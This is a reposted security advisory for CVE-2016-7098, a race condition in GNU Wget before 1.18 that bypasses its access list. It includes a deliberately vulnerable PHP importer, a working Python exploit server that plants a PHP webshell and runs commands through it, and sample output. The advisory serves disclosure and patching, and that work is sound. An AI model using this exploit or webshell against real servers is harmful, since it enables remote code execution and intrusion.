首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GNU Wget < 1.18 - Access List Bypass / Race Condition
来源:https://legalhackers.com 作者:Golunski 发布时间:2016-11-28  
'''
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
 
- CVE-2016-7098
- Release date: 24.11.2016
- Revision 1.0
- Severity: Medium
=============================================
 
 
I. VULNERABILITY
-------------------------
 
GNU Wget < 1.18       Access List Bypass / Race Condition
 
 
II. BACKGROUND
-------------------------
 
"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and
FTP, the most widely-used Internet protocols.
It is a non-interactive commandline tool, so it may easily be called from
scripts, cron jobs, terminals without X-Windows support, etc.
 
GNU Wget has many features to make retrieving large files or mirroring entire
web or FTP sites easy
"
 
https://www.gnu.org/software/wget/
 
 
III. INTRODUCTION
-------------------------
 
GNU wget in version 1.17 and earlier, when used in mirroring/recursive mode,
is affected by a Race Condition vulnerability that might allow remote attackers
to bypass intended wget access list restrictions specified with -A parameter.
This might allow attackers to place malicious/restricted files onto the system.
Depending on the application / download directory, this could potentially lead
to other vulnerabilities such as code execution etc.
 
 
IV. DESCRIPTION
-------------------------
 
When wget is used in recursive/mirroring mode, according to the manual it can
take the following access list options:
 
"Recursive Accept/Reject Options:
  -A acclist --accept acclist
  -R rejlist --reject rejlist
 
Specify comma-separated lists of file name suffixes or patterns to accept or
reject. Note that if any of the wildcard characters, *, ?, [ or ], appear in
an element of acclist or rejlist, it will be treated as a pattern, rather
than a suffix."
 
 
These can for example be used to only download JPG images.
 
It was however discovered that when a single file is requested with recursive
option (-r / -m) and an access list ( -A ), wget only applies the checks at the
end of the download process.
 
This can be observed in the output below:
 
# wget -r -nH -A '*.jpg' http://attackersvr/test.php
Resolving attackersvr... 192.168.57.1
Connecting to attackersvr|192.168.57.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: ‘test.php’
 
15:05:46 (27.3 B/s) - ‘test.php’ saved [52]
 
Removing test.php since it should be rejected.
 
FINISHED
 
 
Although wget deletes the file at the end of the download process, this creates
a race condition as an attacker with control over the URL/remote server could
intentionally slow down the download process so that they had a chance to make
use of the malicious file before it gets deleted.
 
It is very easy to win the race as the file only gets deleted after the HTTP
connection is terminated. The attacker could therefore keep the connection open
as long as it was necessary to make use of the uploaded file as demonstrated
in the proof of concept below.
 
 
V. PROOF OF CONCEPT EXPLOIT
------------------------------
 
 
Here is a simple vulnerable PHP web application that uses wget to download
images from a user-provided server/URL:
 
 
---[ image_importer.php ]---
 
<?php
        // Vulnerable webapp [image_importer.php]
        // Uses wget to import user images from provided site URL
        // It only accepts JPG files (-A wget option).
 
        if ( isset($_GET['imgurl']) ) {
                $URL = escapeshellarg($_GET['imgurl']);
        } else {
                die("imgurl parameter missing");
        }
 
        if ( !file_exists("image_uploads") ) {
                mkdir("image_uploads");
        }
 
        // Download user JPG images into /image_uploads directory
        system("wget -r -nH -P image_uploads -A '*.jpg' $URL 2>&1");
?>
 
 
----------------------------
 
 
For example:
https://victimsvr/image_importer.php?imgurl= href="http://images/logo.jpg">http://images/logo.jpg
 
will cause wget to upload logo.jpg file into:
https://victimsvr/images_uploads/logo.jpg
 
The wget access list (-A) is to ensure that only .jpg files get uploaded.
 
However due to the wget race condition vulnerability an attacker could use
the exploit below to upload an arbitrary PHP script to /image_uploads directory
and achieve code execution.
 
 
---[ wget-race-exploit.py ]---
'''
 
#!/usr/bin/env python
 
#
# Wget < 1.18  Access List Bypass / Race Condition PoC Exploit
# CVE-2016-7098
#
# Dawid Golunski
# https://legalhackers.com
#
#
# This PoC wget exploit can be used to bypass wget -A access list and upload a malicious
# file for long enough to take advantage of it.
# The exploit sets up a web server on port 80 and waits for a download request from wget.
# It then supplies a PHP webshell payload and requests the uploaded file before it gets
# removed by wget.
#
# Adjust target URL (WEBSHELL_URL) before executing.
#
# Full advisory at:
#
# https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
#
# Disclaimer:
#
# For testing purposes only. Do no harm.
#
#
 
import SimpleHTTPServer
import time
import SocketServer
import urllib2
import sys
 
HTTP_LISTEN_IP = '0.0.0.0'
HTTP_LISTEN_PORT = 80
 
PAYLOAD='''
<?php
    //our webshell
    system($_GET["cmd"]);
    system("touch /tmp/wgethack");
?>
'''
 
# Webshell URL to be requested before the connection is closed
# i.e before the uploaded "temporary" file gets removed.
WEBSHELL_URL="http://victimsvr/image_uploads/webshell.php"
 
# Command to be executed through 'cmd' GET paramter of the webshell
CMD="/usr/bin/id"
 
 
class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
   def do_GET(self):
       # Send the payload on GET request
       print "[+] Got connection from wget requesting " + self.path + " via GET :)\n"
       self.send_response(200)
       self.send_header('Content-type', 'text/plain')
       self.end_headers()
       self.wfile.write(PAYLOAD)
       print "\n[+] PHP webshell payload was sent.\n"
 
       # Wait for the file to be flushed to disk on remote host etc.
       print "[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\n"
       time.sleep(2)
 
       # Request uploaded webshell
       print "[+} File '" + self.path + "' should be saved by now :)\n"
       print "[+} Executing " + CMD + " via webshell URL: " + WEBSHELL_URL + "?cmd=" + CMD + "\n"
       print "[+} Command result: "
       print urllib2.urlopen(WEBSHELL_URL+"?cmd="+CMD).read()
 
       print "[+} All done. Closing HTTP connection...\n"
       # Connection will be closed on request handler return
       return
 
handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
 
print "\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \nCVE-2016-7098\n\nDawid Golunski \nhttps://legalhackers.com \n"
print "[+} Exploit Web server started on HTTP port %s. Waiting for wget to connect...\n" % HTTP_LISTEN_PORT
 
handler.serve_forever()
 
'''
------------------------------
 
If the attacker run this exploit on their server ('attackersver') and pointed
the vulnerable script image_importer.php at it via URL:
 
https://victimsvr/image_importer.php?imgurl= href="http://attackersvr/webshell.php">http://attackersvr/webshell.php
 
The attacker will see output similar to:
 
 
 
root@attackersvr:~# ./wget-race-exploit.py
 
Wget < 1.18 Access List Bypass / Race Condition PoC Exploit
CVE-2016-7098
 
Dawid Golunski
https://legalhackers.com
 
[+} Exploit Web server started on HTTP port 80. Waiting for wget to connect...
 
[+] Got connection from wget requesting /webshell.php via GET :)
 
victimsvr - - [24/Nov/2016 00:46:18] "GET /webshell.php HTTP/1.1" 200 -
 
[+] PHP webshell payload was sent.
 
[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...
 
[+} File '/webshell.php' should be saved by now :)
 
[+} Executing /usr/bin/id via webshell URL: http://victimsvr/image_uploads/webshell.php?cmd=/usr/bin/id
 
[+} Command result:
 
uid=33(www-data) gid=33(www-data) groups=33(www-data),1002(nagcmd)
 
[+} All done. Closing HTTP connection...
 
 
 
VI. BUSINESS IMPACT
-------------------------
 
The vulnerability might allow remote servers to bypass intended wget access list
restrictions to temporarily store a malicious file on the server.
In certain cases, depending on the context wget command was used in and download
path, this issue could potentially lead to other vulnerabilities such as
script execution as shown in the PoC section.
 
VII. SYSTEMS AFFECTED
-------------------------
 
Wget < 1.18
 
VIII. SOLUTION
-------------------------
 
Update to latest version of wget 1.18 or apply patches provided by the vendor.
 
IX. REFERENCES
-------------------------
 
https://legalhackers.com
 
https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
 
https://legalhackers.com/exploits/CVE-2016-7098/wget-race-exploit.py
 
https://www.gnu.org/software/wget/
 
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7098
 
https://security-tracker.debian.org/tracker/CVE-2016-7098
 
http://lists.opensuse.org/opensuse-updates/2016-09/msg00044.html
 
http://lists.gnu.org/archive/html/bug-wget/2016-08/msg00124.html
 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7098
 
 
X. CREDITS
-------------------------
 
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
 
https://legalhackers.com
 
XI. REVISION HISTORY
-------------------------
 
24.11.2016 - Advisory released
 
XII. LEGAL NOTICES
-------------------------
 
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
'''
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows Kernel - 'wi
·Remote Utilities Host 6.3 - De
·Linux Kernel 4.6.3 Netfilter P
·Osticket 1.9.14 - 'X-Forwarded
·Linux Kernel 2.6.x pipe.c Priv
·Core FTP LE 2.2 - 'SSH/SFTP' R
·Linux Kernel 2.6.32-rc1 x86_64
·VX Search Enterprise 9.1.12 -
·Linux Kernel 2.6.18 move_pages
·Sync Breeze Enterprise 9.1.16
·Chrome Blink SpeechRecognition
·Dup Scout Enterprise 9.1.14 -
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved